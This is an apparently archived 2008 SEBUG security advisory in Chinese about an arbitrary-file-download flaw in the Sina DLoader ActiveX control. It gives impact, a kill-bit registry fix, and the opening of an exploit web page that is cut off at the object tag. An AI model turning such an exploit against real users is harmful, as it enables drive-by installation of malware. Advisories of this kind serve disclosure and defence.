新浪DLoader Class ActiveX控件任意文件下载漏洞
发布时间(Published):2008-07-18
SBEUGID:SEBUG-20080713683
影响版本(Vulnerable):
Sina UC
漏洞描述(Discription):
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
<* 参考(References)
知道安全
*>
SEBUG安全建议(solution):

目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.

UC的用户请继续关注http://www.51uc.com/进行更新.

也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400

测试方法(Exploit):
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A
// Sebug.net [ 2008-07-19 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号